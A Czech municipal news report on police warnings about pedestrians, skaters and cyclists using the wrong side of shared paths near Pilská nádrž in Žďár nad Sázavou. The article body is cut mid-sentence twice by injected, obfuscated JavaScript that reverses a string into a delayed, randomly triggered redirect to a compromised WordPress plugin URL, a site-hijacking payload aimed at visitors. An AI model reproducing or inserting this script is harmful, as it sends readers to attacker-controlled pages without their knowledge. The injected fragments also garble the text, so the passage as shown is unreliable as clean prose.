Rainbow page separator

Lidé stále chodí po cyklostezkách po nesprávné straně

Středa, 25. dubna 2018

Přístroj sčítá cyklisty i pěší na cyklostezce u Pilské nádrže

Žďár nad Sázavou / Na správnost pohybu po cyklostezkách, které jsou společné pro cyklisty i chodce, opět upozorňují městští policisté. Lidé, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zejména chodci či in-line bruslaři, používají nezřídka nesprávnou stranu komunikace, takže se pak na stezce zvyšuje riziko kolizí.
„Na stezkách pro chodce a cyklisty se chodí či jezdí vpravo. Bruslaři se na stezkách pohybují stejně jako chodci a cyklisté. Při předjíždění či předcházení rychlejší míjejí pomalejší zleva. Cyklista nesmí ohrozit chodce a chodec nesmí ohrozit cyklistu,“ uvedl vedoucí Městské policie ve Žďáře nad Sázavou Martin Kunc.
Větší pozornost by podle jeho slov měla být při předjíždění věnována malým dětem, seniorům, obecně hůře pohyblivějším chodcům nebo lidem se psy. „Bruslaři zpravidla zabírají při jízdě širší pruh než chodci či cyklisté, hůře se jim brzdí a častěji hrozí střet s chodci a cyklisty. Osoba vedoucí psa je podle vyhlášky města povinna mít na stezce psa na vodítku, pes musí být pod jejím neustálým dohledem a přímým vlivem, navíc doporučujeme, aby byl vybaven i náhubkem. U cyklistů zase doporučujeme v rámci předcházení kolizních situací používat zvonek k upozornění ostatních uživatelů stezky,“ přiblížil Martin Kunc.
Strážníci i policisté se na provoz na společných cyklostezkách více zaměřují, což se ale týká třeba i povinné výbavy a stavu bicyklů, případně dechových kontrol cyklistů na pří[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomnost alkoholu.